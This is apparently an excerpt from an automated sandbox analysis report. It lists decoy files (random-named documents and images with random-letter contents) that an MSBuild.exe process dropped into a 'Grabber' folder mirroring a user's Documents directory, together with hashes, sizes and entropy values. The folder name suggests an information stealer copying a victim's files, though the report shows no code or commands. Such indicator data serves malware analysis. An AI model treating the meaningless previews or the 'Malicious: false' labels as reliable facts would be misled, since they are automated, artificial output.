SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL\QNCYCDFIJJ.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL\SFPUSAFIOL.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL\SQSJKEBWDT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL\SUAVTZKNFL.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SQSJKEBWDT.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SUAVTZKNFL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\UOOJJOZIRH\IPKGELNTQY.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
